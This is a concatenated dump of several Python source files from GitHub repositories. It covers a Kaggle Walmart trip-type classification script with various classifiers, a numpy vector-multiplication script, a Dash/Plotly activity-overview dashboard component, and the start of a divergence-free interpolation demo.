Actual_DS.merge(Autoencoder_DS,on='VisitNumber',how='left')\n\n # newcols = list(HLContrib_DS_2.ix[:,'DD_buy1_0':'DD_ret1_68'].columns)\n # newcols.extend(['VisitNumber'])\n # Train_DS = Train_DS.merge(HLContrib_DS_2[newcols],on='VisitNumber',how='left')\n # Actual_DS = Actual_DS.merge(HLContrib_DS_2[newcols],on='VisitNumber',how='left')\n\n ##----------------------------------------------------------------------------------------------------------------##\n #Deleting any features during testing\n #ifyou want to delete main Fn\n test = Train_DS.head()\n test = test.ix[:,'FN_0':'FN_9999'].columns\n Train_DS = Train_DS.drop(test, axis = 1)\n Actual_DS = Actual_DS.drop(test, axis = 1)\n\n #ifyou want to delete 1000 Fn\n test = Train_DS.head()\n test = test.ix[:,'FinelineNumber_1000_1.0':'FinelineNumber_1000_9998.0'].columns\n Train_DS = Train_DS.drop(test, axis = 1)\n Actual_DS = Actual_DS.drop(test, axis = 1)\n\n #ifyou want to delete 1000 Upc\n test = Train_DS.head()\n test = test.ix[:,'Upc_1000_3082.0':'Upc_1000_775014200016.0'].columns\n Train_DS = Train_DS.drop(test, axis = 1)\n Actual_DS = Actual_DS.drop(test, axis = 1)\n\n #Delete only if DD with similarity matrix included\n test = Train_DS.head()\n test = test.ix[:,'DD_buy_0':'DD_ret_WIRELESS'].columns\n Train_DS = Train_DS.drop(test, axis = 1)\n Actual_DS = Actual_DS.drop(test, axis = 1)\n\n print(np.shape(Train_DS))\n print(np.shape(Actual_DS))\n ##----------------------------------------------------------------------------------------------------------------##\n\n print(\"Any scaling , log transformations\")\n\n Actual_DS = Actual_DS.sort(columns='VisitNumber',ascending=True)\n Train_DS, y = shuffle(Train_DS, y)\n\n Train_DS = Train_DS.drop(['VisitNumber'], axis = 1)\n Actual_DS = Actual_DS.drop(['VisitNumber'], axis = 1)\n\n Train_DS = Train_DS.replace([np.inf, -np.inf], np.nan)\n Actual_DS = Actual_DS.replace([np.inf, -np.inf], np.nan)\n\n Train_DS = Train_DS.fillna(0)\n Actual_DS = Actual_DS.fillna(0)\n\n Train_DS = np.array(np.log(100+ Train_DS))\n Actual_DS = np.array(np.log(100+ Actual_DS))\n\n #Setting Standard scaler for data\n stdScaler = StandardScaler(with_mean=True, with_std=True)\n stdScaler.fit(Train_DS,y)\n Train_DS = stdScaler.transform(Train_DS)\n Actual_DS = stdScaler.transform(Actual_DS)\n\n # Train_DS = np.array(Train_DS)\n # Actual_DS = np.array(Actual_DS)\n\n #Use PCA for feature extraction\n # pca = PCA(n_components=500)\n # pca.fit(Train_DS,y )\n # Train_DS = pca.transform(Train_DS)\n # Actual_DS = pca.transform(Actual_DS)\n\n print(np.shape(Train_DS))\n print(np.shape(Actual_DS))\n\n # pd.DataFrame(Train_DS).to_csv(file_path+'Train_DS_50000.csv')\n # sys.exit(0)\n print(\"***************Ending Data cleansing***************\")\n\n return Train_DS, Actual_DS, y\n\n########################################################################################################################\n#Random Forest Classifier (around 80%)\n########################################################################################################################\ndef RFC_Classifier(Train_DS, y, Actual_DS, Sample_DS, Grid):\n print(\"***************Starting Random Forest Classifier***************\")\n t0 = time()\n\n if Grid:\n #used for checking the best performance for the model using hyper parameters\n print(\"Starting model fit with Grid Search\")\n\n # specify parameters and distributions to sample from\n param_dist = {\n \"criterion\":['gini', 'entropy'],\n \"max_depth\": [1, 2, 3, 4, 5,6,7,8,9,10,11,12,13,14,15, None],\n \"max_features\": [1, 2, 3, 4, 5,6,7,8,9,10,11,12,13,14,15, None,'auto','log2'],\n \"min_samples_split\": sp_randint(1, 50),\n \"min_samples_leaf\": sp_randint(1, 50),\n \"bootstrap\": [True],\n \"oob_score\": [True, False]\n }\n\n clf = RandomForestClassifier(n_estimators=100,n_jobs=-1)\n\n # run randomized search\n n_iter_search = 3000\n clf = RandomizedSearchCV(clf, param_distributions=param_dist,\n n_iter=n_iter_search, scoring = 'roc_auc',cv=5)\n\n start = time()\n clf.fit(Train_DS, y)\n\n print(\"RandomizedSearchCV took %.2f seconds for %d candidates\"\n \" parameter settings.\" % ((time() - start), n_iter_search))\n report(clf.grid_scores_)\n\n print(\"Best estimator found by grid search:\")\n print(clf.best_estimator_)\n else:\n\n #CV: 1.505327 , 20 K , n_estimators =100 , features = 343 (without FN and Upc and using eucledean for DD)\n clf = RandomForestClassifier(n_jobs=-1, n_estimators=100, min_samples_split=1,max_features='auto',bootstrap=True,\n max_depth = 8, min_samples_leaf = 4,oob_score=True,criterion='entropy')\n\n #CV: 1.995509 , 20 K , n_estimators =100 , features = 343 (without FN and Upc and using eucledean for DD)\n clf = RandomForestClassifier(n_jobs=-1, n_estimators=100)\n\n Nfold_score = Nfold_Cross_Valid(Train_DS, y, clf)\n\n sys.exit(0)\n #clf = RandomForestClassifier(n_jobs=-1, n_estimators=2000)\n #clf = CalibratedClassifierCV(base_estimator=clf, method='sigmoid')\n\n clf.fit(Train_DS, y)\n\n # #\n # feature = pd.DataFrame()\n # feature['imp'] = clf.feature_importances_\n # feature['col'] = Train_DS1.columns\n # feature = feature.sort(['imp'], ascending=False).reset_index(drop=True)\n # print(feature)\n # pd.DataFrame(feature).to_csv(file_path+'feature_imp.csv')\n\n #Predict actual model\n pred_Actual = clf.predict_proba(Actual_DS)\n print(\"Actual Model predicted\")\n\n #Get the predictions for actual data set\n preds = pd.DataFrame(pred_Actual, index=Sample_DS.VisitNumber.values, columns=Sample_DS.columns[1:])\n preds.to_csv(file_path+'output/Submission_Roshan_rfc_1.csv', index_label='VisitNumber')\n\n print(\"***************Ending Random Forest Classifier***************\")\n return pred_Actual\n\n########################################################################################################################\n#XGB_Classifier\n########################################################################################################################\ndef XGB_Classifier(Train_DS, y, Actual_DS, Sample_DS, Grid):\n\n print(\"***************Starting XGB Classifier***************\")\n t0 = time()\n\n if Grid:\n #used for checking the best performance for the model using hyper parameters\n print(\"Starting model fit with Grid Search\")\n\n param_grid = {'n_estimators': [25],\n 'max_depth': [1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,17,19,20,40,80,100,200],\n 'min_child_weight': [1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,20,40,80,100],\n 'subsample': [0.1,0.2,0.3,0.4,0.5,0.6, 0.7,0.8, 0.9,1],\n 'colsample_bytree': [0.1,0.2,0.3,0.4,0.5,0.6, 0.7,0.8, 0.9,1],\n 'silent':[True],\n 'gamma':[2,1,0.1,0.2,0.3,0.4,0.5,0.6, 0.7,0.8, 0.9]\n }\n\n #run randomized search\n n_iter_search = 800\n clf = xgb.XGBClassifier(nthread=8)\n clf = RandomizedSearchCV(clf, param_distributions=param_grid,\n n_iter=n_iter_search, scoring = 'log_loss',cv=3)\n start = time()\n clf.fit(np.array(Train_DS), np.array(y))\n\n print(\"GridSearchCV completed\")\n Parms_DS_Out = report(clf.grid_scores_,n_top=n_iter_search)\n Parms_DS_Out.to_csv(file_path+'Parms_DS_XGB_4.csv')\n\n print(\"Best estimator found by grid search:\")\n print(clf.best_estimator_)\n sys.exit(0)\n else:\n ##----------------------------------------------------------------------------------------------------------------##\n #best from grid Search, best n_est=175\n #CV:0.936880 , 20 K , n_estimators =100 , features = 343 (without FN and Upc and using eucledean for DD)*** current best\n clf = xgb.XGBClassifier(n_estimators=100,max_depth=100,learning_rate=0.1,nthread=8,min_child_weight=1,\n subsample=0.6,colsample_bytree=0.9,silent=True, gamma = 2 )\n\n ##----------------------------------------------------------------------------------------------------------------##\n #CV: 0.955185 , 20 K , n_estimators =100 , features = 343 (without FN and Upc)\n #CV: 0.935217 , 20 K , n_estimators =100 , features = 343 (without FN and Upc and using eucledean for DD)\n #CV: 0.927019 , 20 K , n_estimators =100 , features = 343 (without FN and Upc and using cos_sim for DD) *****not used ovefitting\n #CV: 0.922370 , 20 K , n_estimators =100 , features = 343 (without FN and Upc and using eucl + cos_sim for DD) *****not used ovefitting\n\n ##................................................................................................................##\n #CV: 0.942477 , 20 K , n_estimators =100 , features = 343 (without FN and Upc and using eucledean for DD)\n #clf = xgb.XGBClassifier(n_estimators=100,nthread=8)\n\n ##----------------------------------------------------------------------------------------------------------------##\n\n Nfold_score = Nfold_Cross_Valid(Train_DS, y, clf)\n\n sys.exit(0)\n\n X_train = np.array(Train_DS)\n Y_train = np.array(y)\n\n clf.fit(X_train, Y_train)\n\n X_Actual = np.array(Actual_DS)\n\n #Predict actual model\n pred_Actual = clf.predict_proba(X_Actual)\n print(\"Actual Model predicted\")\n\n #Get the predictions for actual data set\n preds = pd.DataFrame(pred_Actual, index=Sample_DS.VisitNumber.values, columns=Sample_DS.columns[1:])\n preds.to_csv(file_path+'output/Submission_Roshan_xgb_6_withFNnumber.csv', index_label='VisitNumber')\n\n print(\"***************Ending XGB Classifier***************\")\n return pred_Actual\n\n########################################################################################################################\n#XGB_Classifier\n########################################################################################################################\ndef XGB_Orig_binlog_Classifier(Train_DS, y, Actual_DS, Sample_DS, Grid):\n\n print(\"***************Starting XGB binlog Classifier***************\")\n t0 = time()\n\n if Grid:\n #used for checking the best performance for the model using hyper parameters\n print(\"Starting model fit with Grid Search\")\n else:\n\n #convert all data frames to numpy arrays for xgb use\n dtrain = xgb.DMatrix(Train_DS, label=y)\n dtest = xgb.DMatrix(Actual_DS)\n print(len(np.unique(y)))\n\n #only for cross validation\n # X_train, X_cv, Y_train, Y_cv = train_test_split(Train_DS, y, test_size=0.5, random_state=42)\n # dtrain = xgb.DMatrix(X_train, label=Y_train)\n # dtest = xgb.DMatrix(X_cv, label=Y_cv)\n\n # specify parameters\n # param = {'max_depth':14, 'eta':0.01, 'min_child_weight':8,'subsample': 0.9,'colsample_bytree':0.3,\n # 'silent':True, 'gamma': 0.9,'nthread': -1,'objective':'binary:logistic', 'eval_metric':'auc' }\n\n param = {'nthread': 8,'objective':'multi:softprob','num_class':len(np.unique(y)), 'eval_metric':'mlogloss','silent':True}\n\n plst = param.items()\n #best with 115 rounds 0.7522\n num_round = 115\n\n #print ('running cross validation')\n #xgb.cv(param, dtrain, num_round, nfold=2,metrics={'mlogloss'}, seed = 0, show_stdv = False)\n\n # specify validations set to watch performance\n watchlist = [(dtest,'eval'), (dtrain,'train')]\n\n print(\"Starting training\")\n\n #clf = xgb.train( plst, dtrain, num_round,watchlist,early_stopping_rounds=50)\n\n clf = xgb.train( plst, dtrain, num_round)\n print(\"training completed\")\n\n #print \"testing\"\n pred_Actual = clf.predict(dtest)\n\n print(\"Actual Model predicted\")\n\n #Get the predictions for actual data set\n preds = pd.DataFrame(pred_Actual, index=Sample_DS.VisitNumber.values, columns=Sample_DS.columns[1:])\n preds.to_csv(file_path+'output/Submission_Roshan_xgb_orig_6_withFNnumber.csv', index_label='VisitNumber')\n\n print(\"***************Ending XGB Classifier***************\")\n return pred_Actual\n########################################################################################################################\n#Misc Classifier\n########################################################################################################################\ndef Misc_Classifier(Train_DS, y, Actual_DS, Sample_DS, Grid):\n print(\"***************Starting Misc Classifier***************\")\n t0 = time()\n\n if Grid:\n #used for checking the best performance for the model using hyper parameters\n print(\"Starting model fit with Grid Search\")\n\n else:\n\n #CV - 0.666186155556\n #CV - 0.6670 - remove date MM/DD/YY and todays difff\n # clf = LogisticRegression()\n # Nfold_score = Nfold_Cross_Valid(Train_DS, y, clf)\n #sys.exit(0)\n\n #print(\"Adaboost\")\n #CV: 0.7099\n #clf = AdaBoostClassifier(n_estimators=100)\n\n # print(\"BaggingClassifier\")\n # #CV:\n # clf = BaggingClassifier(n_estimators=100)\n # Nfold_score = Nfold_Cross_Valid(Train_DS, y, clf)\n #\n # print(\"ExtraTreesClassifier\")\n # #CV:2.22\n # clf = ExtraTreesClassifier(n_estimators=100)\n # Nfold_score = Nfold_Cross_Valid(Train_DS, y, clf)\n\n # print(\"MultinomialNB\")\n # #CV:\n # clf = MultinomialNB()\n # Nfold_score = Nfold_Cross_Valid(Train_DS, y, clf)\n #\n # print(\"BernoulliNB\")\n # #CV:\n # clf = BernoulliNB()\n # Nfold_score = Nfold_Cross_Valid(Train_DS, y, clf)\n\n #clf = SVC(kernel='rbf', class_weight='auto',C=1e5, gamma= 0.001,probability=True)\n clf = SVC(probability=True)\n Nfold_score = Nfold_Cross_Valid(Train_DS, y, clf)\n sys.exit(0)\n\n clf.fit(Train_DS, y)\n\n # feature = pd.DataFrame()\n # feature['imp'] = clf.feature_importances_\n # feature['col'] = Train_DS1.columns\n # feature = feature.sort(['imp'], ascending=False).reset_index(drop=True)\n # print(feature)\n\n #Predict actual model\n pred_Actual = clf.predict(Actual_DS)[:,1]\n print(\"Actual Model predicted\")\n\n #Get the predictions for actual data set\n preds = pd.DataFrame(pred_Actual, index=Sample_DS.ID.values, columns=Sample_DS.columns[1:])\n preds.to_csv(file_path+'output/Submission_Roshan_Misc_filter_2.csv', index_label='ID')\n\n print(\"***************Ending Random Forest Classifier***************\")\n return pred_Actual\n\n#########################################################################################################################\n#Neural Network Classifier 1\n########################################################################################################################\ndef NN1_Classifier(Train_DS, y, Actual_DS, Sample_DS, Grid):\n\n print(\"***************Starting NN1 Classifier***************\")\n t0 = time()\n\n if Grid:\n #used for checking the best performance for the model using hyper parameters\n print(\"Starting model fit with Grid Search\")\n\n else:\n #y = y.reshape((-1, 1))\n\n learning_rate = theano.shared(np.float32(0.1))\n\n y = y.astype(np.int32)\n Train_DS = Train_DS.astype('float32')\n Actual_DS = Actual_DS.astype('float32')\n\n ##----------------------------------------------------------------------------------------------------------------##\n #Best CV's\n #CV:1.011700 ,sigmoid, max_epochs =15 , Dense = 700,700 (without FN and Upc and using eucledean for DD)\n #CV:1.010100 ,sigmoid, max_epochs =15 , Dense = 1000,1000 (without FN and Upc and using eucledean for DD)\n #CV:0.963210 ,sigmoid, max_epochs =265 , Dense = 500,500 (without FN and Upc and using eucledean for DD)\n #CV:0.962284 ,sigmoid, max_epochs =266 , Dense = 500,500 (without FN and Upc and using eucledean for DD & no np.log )*** current best\n #CV:0.965358 ,sigmoid, max_epochs =227 , Dense = 500,500 (without FN and Upc and using eucledean for DD & autoencoder)\n\n ##----------------------------------------------------------------------------------------------------------------##\n clf = build_mlp(Train_DS.shape[1],len(np.unique(y)))\n\n #clf = build_rnn(Train_DS.shape[1],len(np.unique(y)))\n\n #Train_DS, y = shuffle(Train_DS, y, random_state=123)\n clf.fit(Train_DS, y)\n\n # _, X_valid, _, y_valid = clf.train_test_split(Train_DS, y, clf.eval_size)\n # probas = clf.predict_proba(X_valid)[:,0]\n # print(\"ROC score\", metrics.roc_auc_score(y_valid, probas))\n\n print(\"done in %0.3fs\" % (time() - t0))\n\n sys.exit(0)\n\n #Predict actual model\n pred_Actual = clf.predict_proba(Actual_DS)\n print(\"Actual Model predicted\")\n\n #Get the predictions for actual data set\n\n preds = pd.DataFrame(pred_Actual, index=Sample_DS.VisitNumber.values, columns=Sample_DS.columns[1:])\n preds.to_csv(file_path+'output/Submission_Roshan_NN5.csv', index_label='VisitNumber')\n\n print(\"***************Ending NN1 Classifier***************\")\n return pred_Actual\n\n########################################################################################################################\n#Main module #\n########################################################################################################################\ndef main(argv):\n\n pd.set_option('display.width', 200)\n pd.set_option('display.height', 500)\n\n warnings.filterwarnings(\"ignore\")\n\n global file_path, Train_DS1, Featimp_DS, Mlogloss_scorer, HLContrib_DS, HLContrib_DS_2, Autoencoder_DS\n\n # Mlogloss\n Mlogloss_scorer = metrics.make_scorer(multiclass_log_loss, greater_is_better = False)\n\n random.seed(42)\n np.random.seed(42)\n\n if(platform.system() == \"Windows\"):\n\n file_path = 'C:/Python/Others/data/Kaggle/Walmart_Recruiting_TTC/'\n else:\n file_path = '/home/roshan/Desktop/DS/Others/data/Kaggle/Walmart_Recruiting_TTC/'\n\n########################################################################################################################\n#Read the input file , munging and splitting the data to train and test\n########################################################################################################################\n # Train_DS = pd.read_csv(file_path+'train_Grouped5_withFNnumber.csv',sep=',')\n # Actual_DS = pd.read_csv(file_path+'test_Grouped5_withFNnumber.csv',sep=',')\n Sample_DS = pd.read_csv(file_path+'sample_submission.csv',sep=',')\n #HLContrib_DS = pd.read_csv(file_path+'High_Lowest_Contributors_utilities_new.csv',sep=',',index_col=0)\n #HLContrib_DS = pd.read_csv(file_path+'High_Lowest_Contributors_utilities.csv',sep=',',index_col=0)\n #Autoencoder_DS = pd.read_csv(file_path+'Autoencoder_output.csv',sep=',',index_col=0)\n\n Create_file = False\n count = 5000\n\n ifile = 5\n\n if Create_file:\n Train_DS = pd.read_csv(file_path+'train_Grouped_withFNnumber_'+str(ifile)+'.csv',sep=',')\n Actual_DS = pd.read_csv(file_path+'test_Grouped_withFNnumber_'+str(ifile)+'.csv',sep=',')\n\n print(np.shape(Train_DS))\n print(np.shape(Actual_DS))\n ##----------------------------------------------------------------------------------------------------------------##\n # Train_DS = (Train_DS.reindex(np.random.permutation(Train_DS.index))).reset_index(drop=True)\n # Train_DS = Train_DS.head(count)\n # pd.DataFrame(Train_DS).to_csv(file_path+'train_Grouped_withFNnumber_temp_'+str(ifile)+'.csv')\n #\n # Actual_DS = (Actual_DS.reindex(np.random.permutation(Actual_DS.index))).reset_index(drop=True)\n # Actual_DS = Actual_DS.head(count)\n # pd.DataFrame(Actual_DS).to_csv(file_path+'test_Grouped_withFNnumber_temp_'+str(ifile)+'.csv')\n #\n # print(np.shape(Train_DS))\n # print(np.shape(Actual_DS))\n\n else:\n Train_DS = pd.read_csv(file_path+'train_50000.csv',sep=',',index_col=0,nrows = count)\n Actual_DS = pd.read_csv(file_path+'test_50000.csv',sep=',',index_col=0,nrows = count)\n #Train_DS = (Train_DS.reindex(np.random.permutation(Train_DS.index))).reset_index(drop=True)\n\n #Train_DS = pd.read_csv(file_path+'train_Grouped_withFNnumber_temp_'+str(ifile)+'.csv',sep=',', index_col=0,nrows = count).reset_index(drop=True)\n #Actual_DS = pd.read_csv(file_path+'test_Grouped_withFNnumber_temp_'+str(ifile)+'.csv',sep=',', index_col=0,nrows = count).reset_index(drop=True)\n\n ##----------------------------------------------------------------------------------------------------------------##\n\n Train_DS, Actual_DS, y = Data_Munging(Train_DS,Actual_DS)\n\n pred_Actual = XGB_Orig_binlog_Classifier(Train_DS, y, Actual_DS, Sample_DS, Grid=False)\n #pred_Actual = XGB_Classifier(Train_DS, y, Actual_DS, Sample_DS, Grid=False)\n #pred_Actual = XGB_Classifier1(Train_DS, y, Actual_DS, Sample_DS, Grid=False)\n #pred_Actual = RFC_Classifier(Train_DS, y, Actual_DS, Sample_DS, Grid=False)\n pred_Actual = Misc_Classifier(Train_DS, y, Actual_DS, Sample_DS, Grid=False)\n #pred_Actual = NN1_Classifier(Train_DS, y, Actual_DS, Sample_DS, Grid=False)\n########################################################################################################################\n#Main program starts here #\n########################################################################################################################\nif __name__ == \"__main__\":\n main(sys)","repo_name":"roshankr/DS_Competition","sub_path":"WR_TTC_v04.py","file_name":"WR_TTC_v04.py","file_ext":"py","file_size_in_byte":45686,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"69997582910","text":"import numpy as np\n\ndef multiply_vectors():\n # Get the user input for the first vector\n vector1 = input(\"Enter the first vector (separated by spaces): \")\n vector1 = list(map(int, vector1.split()))\n\n # Get the user input for the second vector\n vector2 = input(\"Enter the second vector (separated by spaces): \")\n vector2 = list(map(int, vector2.split()))\n\n try:\n # Multiply the vectors using numpy\n result = np.multiply(vector1, vector2)\n \n # Print the result\n print(\"Result: \", result)\n \n except ValueError:\n # Handle the exception if the vectors are not of the same length\n print(\"Error: Vectors must be of the same length\")\n\nif __name__ == \"__main__\":\n multiply_vectors()\n","repo_name":"DSAatUSU/ChatGPT-promises-and-pitfalls","sub_path":"3.5turbo/mathematics/linear-algebra/is-a-calculator-that-multiplies-two-vectors.py","file_name":"is-a-calculator-that-multiplies-two-vectors.py","file_ext":"py","file_size_in_byte":752,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"60"} +{"seq_id":"32469662614","text":"from typing import List, Tuple\n\nimport plotly.express as px\nimport plotly.graph_objects as go\nfrom dash import html, dcc\nimport dash_bootstrap_components as dbc\nfrom dash.development.base_component import Component\n\nfrom shyft.app.view.dash_components.base import BaseDashComponentFactory\nfrom shyft.logger import get_logger\n\n_logger = get_logger(__name__)\n\n\nclass OverviewComponentFactory(BaseDashComponentFactory):\n \"\"\"A class for generating Dash components used in an overview of\n multiple activities.\n \"\"\"\n\n def page_heading(self) -> Component:\n return html.H1(f'Activity overview for {self.config.user_name}')\n\n def weekday_count(self) -> Component:\n _logger.debug('Generating weekday count graph.')\n counts = self.summary.groupby(['activity_type', 'day']).count()['activity_id'].rename('count')\n for act_type in counts.index.levels[0]:\n for day in self.config.days_of_week:\n if day not in counts[act_type]:\n counts.loc[act_type, day] = 0\n counts.sort_index(level=1, key=lambda i: i.map(self.config.days_of_week.index), inplace=True)\n bars = []\n for act_type in counts.index.levels[0]:\n bars.append(go.Bar(name=act_type, x=self.config.days_of_week, y=counts[act_type]))\n fig = go.Figure(data=bars)\n fig.update_layout(barmode='stack', title='Most active days of the week')\n return dcc.Graph(id='weekday_count', figure=fig)\n\n def _axis_labels(self, data_name: str) -> Tuple[str, str]:\n \"\"\"\n Get appropriate DataFrame column name and readable axis label. \n\n :param data_name: Describes what data we want to display. See docs for `main_scatter_fig` and `main_time_fig`\n methods for permitted values.\n :return: A 2-tuple containing the name of the relevant column in the `summary` DataFrame as the first element,\n and the axis label to display to the user as the second element.\n \"\"\"\n\n # Single activity attributes (column name must be present in summary dataframe)\n if data_name == 'distance':\n if self.config.distance_unit == 'km':\n return 'distance_2d_km', 'Distance (km)'\n elif self.config.distance_unit == 'mile':\n return 'distance_2d_mile', 'Distance (miles)'\n elif data_name == 'duration':\n return 'duration', 'Duration (minutes)'\n\n # These can be used for either single activities (summary dataframe) or aggregates (time series dataframe)\n elif data_name == 'mean_speed':\n if self.config.distance_unit == 'km':\n return 'mean_kmph', 'Average speed (km/hour)'\n elif self.config.distance_unit == 'mile':\n return 'mean_mph', 'Average speed (miles/hour)'\n elif data_name == 'mean_hr':\n return 'mean_hr', 'Average heart rate (beats/minute)'\n\n # Aggregate attributes (column name must be present in time series dataframe)\n elif data_name == 'total_distance':\n if self.config.distance_unit == 'km':\n return 'total_distance_2d_km', 'Total distance (km)'\n elif self.config.distance_unit == 'mile':\n return 'total_distance_2d_mile', 'Total distance (miles)'\n elif data_name == 'total_duration':\n return 'total_duration', 'Total duration (minutes)'\n elif data_name == 'activity_count':\n return 'activity_count', 'Number of activities'\n\n else:\n raise ValueError(f'Bad value for `data_name`: \"{data_name}\".')\n\n\n def main_scatter_fig(self, x: str, y: str) -> go.Figure:\n \"\"\"\n Generate the main scatter plot figure.\n\n :param x: What to display on the x axis. Should be one of `distance`, `mean_speed`, `duration` or `mean_hr`.\n :param y: What to display on the y axis. Has the same permitted values as `x`.\n :return: A go.Figure object representing the scatter plot.\n \"\"\"\n x_col, x_label = self._axis_labels(x)\n y_col, y_label = self._axis_labels(y)\n fig = px.scatter(\n self.summary,\n x=x_col,\n y=y_col,\n labels={\n x_col: x_label,\n y_col: y_label,\n 'activity_type': 'Activity type'\n },\n color='activity_type',\n custom_data=['activity_id']\n )\n fig.update_layout(clickmode='event+select')\n return fig\n\n\n def main_scatterplot(self) -> Component:\n \"\"\"\n A configurable scatterplot of all activities.\n \"\"\"\n _logger.debug('Generating main scatterplot.')\n\n x_dropdown = dcc.Dropdown(id='overview_main_scatterplot_x_dropdown', options=[\n {'label': 'Distance', 'value': 'distance'},\n {'label': 'Average speed', 'value': 'mean_speed'},\n {'label': 'Average heart rate', 'value': 'mean_hr'},\n {'label': 'Duration', 'value': 'duration'}\n ], value='distance')\n y_dropdown = dcc.Dropdown(id='overview_main_scatterplot_y_dropdown', options=[\n {'label': 'Distance', 'value': 'distance'},\n {'label': 'Average speed', 'value': 'mean_speed'},\n {'label': 'Average heart rate', 'value': 'mean_hr'},\n {'label': 'Duration', 'value': 'duration'}\n ], value='mean_speed')\n\n button = dbc.Button('View selected activities', id='overview_main_scatterplot_button')\n link = html.A(button, href='/activities', id='overview_main_scatterplot_link', target='_blank')\n\n config_row = dbc.Row([\n dbc.Col(html.Div(['x axis:', x_dropdown])),\n dbc.Col(html.Div(['y axis:', y_dropdown])),\n dbc.Col(link, width='auto')\n ], justify='center')\n\n graph = dcc.Graph(\n id='overview_main_scatterplot',\n figure=self.main_scatter_fig('distance', 'mean_speed')\n )\n\n return html.Div([\n html.H2('Scatter plot'), config_row, graph\n ])\n\n _TIME_CHART_TYPES = {\n 'mean_speed': px.line,\n 'total_distance': px.bar,\n 'total_duration': px.bar,\n 'mean_hr': px.line,\n 'activity_count': px.bar\n }\n\n def main_time_fig(self, freq: str, y: str) -> go.Figure:\n \"\"\"\n Generate the chart figure for the main time plot.\n\n :param freq: What frequency to use for the plot. Should be one\n of \"weekly\" or \"monthly\".\n :param y: Value to display on the y axis. Should be one of\n \"mean_speed\", \"total_distance\", \"total_duration\",\n \"mean_hr\" or \"activity_count\".\n :return: A go.Figure object representing the appropriate chart.\n The type of the chart will depend on the type of data to be\n displayed on the y axis.\n \"\"\"\n if freq == 'weekly':\n df = self.activity_manager.metadata_weekly_time_series()\n date_label = 'Week of'\n elif freq == 'monthly':\n df = self.activity_manager.metadata_monthly_time_series()\n date_label = 'Month of'\n else:\n raise ValueError(f'`freq` must be one of \"weekly\" or \"monthly\", not \"{freq}\".')\n\n if y == 'total_duration':\n # Need to convert timedelta to number of minutes\n df[y] = df[y].dt.total_seconds() / 60\n\n y_col, y_label = self._axis_labels(y)\n return self._TIME_CHART_TYPES[y](\n df,\n y=y_col,\n labels={\n 'date': date_label,\n y_col: y_label\n },\n )\n\n def main_time_chart(self) -> Component:\n \"\"\"\n A line chart plotting some selected value over time.\n \"\"\"\n _logger.debug('Generating time graph.')\n df = self.activity_manager.metadata_weekly_time_series(activity_type='run')\n\n freq_dropdown = dcc.Dropdown(id='overview_main_time_chart_freq_dropdown', options=[\n {'label': 'Weekly', 'value': 'weekly'},\n {'label': 'Monthly', 'value': 'monthly'}\n ], value='monthly')\n\n y_dropdown = dcc.Dropdown(id='overview_main_time_chart_y_dropdown', options=[\n {'label': 'Average speed', 'value': 'mean_speed'},\n {'label': 'Total distance', 'value': 'total_distance'},\n {'label': 'Total duration', 'value': 'total_duration'},\n {'label': 'Average heart rate', 'value': 'mean_hr'},\n {'label': 'Number of activities', 'value': 'activity_count'}\n ], value='activity_count')\n\n graph = dcc.Graph(\n id='overview_main_time_chart',\n figure=self.main_time_fig('weekly', 'activity_count')\n )\n return html.Div([\n html.H2('Progress over time'),\n dbc.Row([\n dbc.Col(html.Div(['Frequency:', freq_dropdown])),\n dbc.Col(html.Div(['y axis:', y_dropdown]))\n ]),\n graph\n ])\n\n def custom_graphs(self) -> List[Component]:\n \"\"\"Generate all graphs based on the contents of config.overview_graphs\n (which is in turn generated based on the contents of test_overview_graphs.json).\n\n See docs/graphs.rst for help on how test_overview_graphs.json is interpreted.\n \"\"\"\n graphs = []\n # TODO: Figure this out\n for i, go_data in enumerate(self.config.overview_graphs):\n groupby = go_data.pop('groupby', None)\n agg = go_data.pop('agg', None)\n if groupby and agg:\n data = getattr(self.summary.groupby(groupby), agg)()\n else:\n data = self.summary\n graphs.append(\n dbc.Row(\n dbc.Col(\n dcc.Graph(\n id=f'graph_{i}',\n figure=self.graph(data, go_data.pop('graph_type'), **go_data)\n )\n )\n )\n )\n return graphs\n\n def graphs_or_no_activity_msg(self, markdown: str = 'No recent activities found. Upload some!') -> Component:\n if self.activity_manager.activity_ids:\n _logger.debug('Activities found; generating graphs.')\n return html.Div([\n html.H2('Analysis'),\n self.weekday_count(),\n self.main_scatterplot(),\n self.main_time_chart(),\n *self.custom_graphs(),\n ])\n else:\n _logger.debug('No activities found; returning markdown.')\n return dcc.Markdown(markdown)\n","repo_name":"bunburya/shyft","sub_path":"shyft/app/view/dash_components/overview.py","file_name":"overview.py","file_ext":"py","file_size_in_byte":10563,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"60"} +{"seq_id":"39566369668","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport time\nplt.rcParams['figure.dpi'] = 500\nimport Divergence_Free_Interpolant as dfi\n\nnp.random.seed(69)\ndiv = lambda n, d: np.divide(n, d, out = np.zeros_like(d), where=d!=0)\n\n## Analytic vectorfield definition; has to be divergence free\nvector_field = lambda x, y: np.array([-2*x**3 * y, 3*x**2 * y**2])\n\n## Number of sample points\nN = 25\n\n## Random sample points\nX, Y = np.random.rand(N), np.random.rand(N)\n\n## Get vectorfield sample values\nUV = vector_field(X, Y)\nU, V = UV[0], UV[1]\n\nS = (U**2 + V**2)**0.5\n\n## Visualize vectorfield\nfig, ax = plt.subplots(1, 1)\nquiver = ax.quiver(X, Y, div(U, S), div(V, S), S, cmap ='autumn')\nax.set_aspect('equal')\nax.set_xlim(0,1)\nax.set_ylim(0,1)\nfig.colorbar(quiver)\nplt.show()\nplt.close()\n\n## Initialize the interpolant, nu = 5, k = 3 will suffice almost always, dim is the dimensionality\n## default \ninitialized_interpolant = dfi.interpolant(nu = 5, k = 3, dim = 2)\n\n## Condition the vectorfield \n## initialized_interpolant.condition(positions, vectors, support_radius, method)\n## positions: np.ndarray, (dim, N)\n## vectors: np.ndarray, (dim, N)\n## support_radius: positive float\n## method: string : default = linsolve: options = [SVD, penrose, linsolve, lstsq]\nt1 = time.perf_counter()\ninitialized_interpolant.condition(np.array([X, Y]).T, UV.T, 1)\nprint('Conditioning time: ', time.perf_counter() - t1)\n\n## Create resampling points\n_n, _m = 100, 100\nXX, YY = np.mgrid[0:1:_n*1j, 0:1:_m*1j]\n\n## Call the interpolant passing resampling coordinates\n## initialized_interpolant(X, 